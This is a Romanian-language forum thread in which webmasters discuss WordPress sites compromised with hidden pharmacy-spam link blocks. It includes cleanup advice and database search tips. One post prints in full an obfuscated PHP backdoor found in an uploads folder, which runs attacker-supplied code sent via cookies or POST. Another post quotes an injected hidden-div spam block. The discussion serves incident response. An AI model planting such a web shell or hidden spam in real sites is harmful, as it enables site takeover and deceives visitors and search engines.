Hack wordpress: Recomand sa verificati site-urile

AlexH

Merg pe strada catre Mine...
Membru personal
Administrative
Freelancer
SEO Expert
Acum cateva zile @dani67 mi-a spus ca a primit notificare ca un articol este vazut ca are virus. Dupa ce am verficat am vazut in sursa mai multe link adaugate la final de articol cu display none. Nu stiu cum sa facut ca dupa asta mai multi m-au contactat pe aceiasi problema si dupa verificare am vazut aceiasi problema. Nu toate articolele aveai la final link ciudate sau coduri js adaugate ci doare unele.

Themele nu sunt aceleasi iar despre pluginuri nu pot spune nimic pentru ca nu stiu daca folosesc toti care au raportat folosesc acelasi pluginuri. Ieri am verificat un site mai vechi de al meu si am descoperit 15 articole pana acum care au astfel de link la final si la unele textul a fost schimbat cu aceste link-uri.

Desigur ca am verificat logurile sa vad daca am o problema de securitate si nu am gasit nimic, plus am si alte site-uri care unele folosesc aceleasi pluginuri si theme dar nu sunt compromise.

In acest moment nu stiu cum a fost posibil si prin ce metoda au adaugat acele link-uri in articol, plus eu am update la zi la toate.
Recomanda sa verificati manual, pentru ca automat nu se poate fiecare articol sa vedeti daca nu cumva aveti aceasta problema.

Pana acum 20 persoane mi-au raportat aceasta problema.


La site-uri care am descoperit aceste link-uri am vazut o scadere mare in google deci daca aveti problema asta atunci e bine sa verificati articolele.
Cand editati articolele dati click pe Text si nu Visual pentru a vedea daca exista ceva suspect in articol. La unele exista un spatiu foarte mare de la final text si singura metoda pentru a da scroll in jos este cu sageata in jos din tastatura pentru ca scoll din mouse nu functioneaza.
 
Exemplu de link gasit la mine:
Cod:
<div style="position: absolute; left: -3046px; top: -3137px;">

Sure same promises <a href="http://www.galvaunion.com/nilo/minocycline.php">http://www.galvaunion.com/nilo/minocycline.php</a> you product Natural <a href="http://gearberlin.com/oil/generic-drugs-for-erectile-dysfunction/">generic drugs for erectile dysfunction</a> the? In <a href="http://www.ferroformmetals.com/bupropion-for-sale">bupropion for sale</a> even, little this, ready <a href="http://gogosabah.com/tef/propecia-asia.html">lexapro 10 mg</a> outstanding expensive these <a href="http://gogosabah.com/tef/how-to-use-trimix-gel.html">how to use trimix gel</a> He. To new batch scent <a href="http://www.haghighatansari.com/buying-prescriptions-from-canada.php">buying prescriptions from canada</a> excess almost-shaved smelled <a href="http://gearberlin.com/oil/medicine-like-prednisone/">no perscription abilify online</a> patient problem that sandwich <a rel="nofollow" href="http://www.floridadetective.net/thailand-online-pharmacy.html">http://www.floridadetective.net/thailand-online-pharmacy.html</a> review thought in about then.

</div>

Daca stie cineva cum se face pentru a cauta in baza de date dupa acest exemplu si sterge unde gaseste ar fi super.
 
Am observat ca toate articolele compromise au tag acesta
Cod:
<address>  </address>
desi eu nu folosesc acest tag pentru format la articole. Nu stiu cata relevanta are, dar ma gandesc ca fiecare amanunt poate ajuta.
 
Pai in admin panel, la posts, cauta tagul
<address>
Si vezi ce rezultate ai. Cautarea merge si pe tag,iframe,etc. Dar in admin panel, nu cu search pe site - ca sa fii sigur.
Vezi daca iti apar asa articolele care contin tagul. Sunt curios daca merge.

Posibil un exploit in jetpack. Nu stiu ce sa zic.
 
Observ si eu pe 6 site-uri wordpress-uri compromise. Nu am gasit inca link ascuns dar am gasit in public_html fisiere .php de diferite nume si codate.

Ex fisier jvlcqrla.php
<?php
$xkzju = 'dy-6v0ap*_c3#sufixo5Hebm8\'tkg9r41nl2';$tlwli = Array();$tlwli[] = $xkzju[35].$xkzju[6].$xkzju[15].$xkzju[19].$xkzju[35].$xkzju[21].$xkzju[35].$xkzju[32].$xkzju[2].$xkzju[10].$xkzju[21].$xkzju[31].$xkzju[15].$xkzju[2].$xkzju[31].$xkzju[5].$xkzju[24].$xkzju[24].$xkzju[2].$xkzju[29].$xkzju[10].$xkzju[6].$xkzju[11].$xkzju[2].$xkzju[24].$xkzju[0].$xkzju[10].$xkzju[31].$xkzju[10].$xkzju[3].$xkzju[5].$xkzju[15].$xkzju[32].$xkzju[19].$xkzju[31].$xkzju[19];$tlwli[] = $xkzju[20].$xkzju[8];$tlwli[] = $xkzju[12];$tlwli[] = $xkzju[10].$xkzju[18].$xkzju[14].$xkzju[33].$xkzju[26];$tlwli[] = $xkzju[13].$xkzju[26].$xkzju[30].$xkzju[9].$xkzju[30].$xkzju[21].$xkzju[7].$xkzju[21].$xkzju[6].$xkzju[26];$tlwli[] = $xkzju[21].$xkzju[17].$xkzju[7].$xkzju[34].$xkzju[18].$xkzju[0].$xkzju[21];$tlwli[] = $xkzju[13].$xkzju[14].$xkzju[22].$xkzju[13].$xkzju[26].$xkzju[30];$tlwli[] = $xkzju[6].$xkzju[30].$xkzju[30].$xkzju[6].$xkzju[1].$xkzju[9].$xkzju[23].$xkzju[21].$xkzju[30].$xkzju[28].$xkzju[21];$tlwli[] = $xkzju[13].$xkzju[26].$xkzju[30].$xkzju[34].$xkzju[21].$xkzju[33];$tlwli[] = $xkzju[7].$xkzju[6].$xkzju[10].$xkzju[27];foreach ($tlwli[7]($_COOKIE, $_POST) as $xhwddo => $atvewi){function rlitab($tlwli, $xhwddo, $uvzwlry){return $tlwli[6]($tlwli[4]($xhwddo . $tlwli[0], ($uvzwlry / $tlwli[8]($xhwddo)) + 1), 0, $uvzwlry);}function lhounp($tlwli, $grtsiv){return @$tlwli[9]($tlwli[1], $grtsiv);}function ifnwv($tlwli, $grtsiv){$vcjhevx = $tlwli[3]($grtsiv) % 3;if (!$vcjhevx) {eval($grtsiv[1]($grtsiv[2]));exit();}}$atvewi = lhounp($tlwli, $atvewi);ifnwv($tlwli, $tlwli[5]($tlwli[2], $atvewi ^ rlitab($tlwli, $xhwddo, $tlwli[8]($atvewi))));}

Screenshot_4.png
Fisierele din print le-am gasit in folderul uploads dar nu toate la 1 loc. Mai exista si fisiere in alte parti precum wordpress si chiar si tema.

Cum puteti remedia problema?
1. Back-up prima data
2. Stergeti tot de pe server(clean install de preferat)
3. Descarcati wordpress si puneti toate fisierele pe server in afara de folderul wp-content
4. Luati la mana wp-content al vostru din back-up . De ex: in folder wp-content/themes puteti sterge tema si urcati din nou tema originala
Apoi in folder wp-content/plugins stergeti toate pluginuri(nu inainte de a nota intr-un notepad numele lor) apoi le cautati direct pe wordpress.org si le descarcati si le puneti in acelasi folder
wp-content/uploads de verificat cu maxima atentie

PS: Toate site-urile mele wp compromise ruleaza pe VestaCP. @AlexH toti cei compromisi au acelasi lucru in comun? VestaCP adica?
 
Ultima editare:
Eu am migrat totul de ceva vreme pe centos panel dupa ce vesta cp a fost folosit pentru un atack ddos.
Un singur site mai am pe vesta cp sii voi verifica acum daca este ceva suspect.
Fisiere de gen nu am gasit inca, doar acele link puse in articole.
Stie cineva formula de find si replace la asta
find
Cod:
<div style="position: absolute; left: -3046px; top: -3137px;"> orice este aici </div>
 
Acum vreo 5-6 ani am patit-o cu CPanel ... si la asta m-am gandit cand am citit dar voi spuneti ca este Vesta ... :)
Cu siguranta atunci cand pica atat de multe este ceva legat de gazduire, sistemele de hosting fiind cele atasate.
Acum sa vezi clienti :)

Atunci cand a fost de vina CPanel, la fel ... am avut un spike in ceea ce priveste redeventele :)
 
Eu am migrat totul de ceva vreme pe centos panel dupa ce vesta cp a fost folosit pentru un atack ddos.
Un singur site mai am pe vesta cp sii voi verifica acum daca este ceva suspect.
Fisiere de gen nu am gasit inca, doar acele link puse in articole.
Stie cineva formula de find si replace la asta
find
Cod:
<div style="position: absolute; left: -3046px; top: -3137px;"> orice este aici </div>

E mare baza de date ?
Ca ... daca e ceva modest o poti rezolva cu notepad++
 
Cauta pe cuvinte mai mici ... ar trebui sa existe ...
style="position - de exemplu ...
Altfel cum ar citi wp-ul articolele daca nu din baza de date ...
Ai optiuni la notepad++ la search and replace ...
Si la mine sunt momente cand nu vrea la cautarea cu tag-uri de exemplu insa indentific un loc unde apare si copiez exact cum apare ...

Foarte multe situatiile in care notepad-ul m-a ajutat ....
 
In db am gasit asta la Meta Key: arkayne-cache-post.
E posibil sa fie vorba despre cache poisoning attack care se discuta acum cateva zile si care este inca o problema mare.
 
Sau notepad clasic are replace: ctrl+h.
Ai putea scana site de external links, cu un scanner online (website) care sa te duca direct la paginile cu pricina. Asta daca nu ai multe iesiri.

Iar ca fisiere pe host, cel mai ok cred ca ar fi sa dai export la posturi,categorii,taguri, etc din admin panel wordpress cu plugin, si faci reinstall la tot cu import apoi. Apoi ramane doar folderul tema sa fie investigat.
 
Loading...
Back
Sus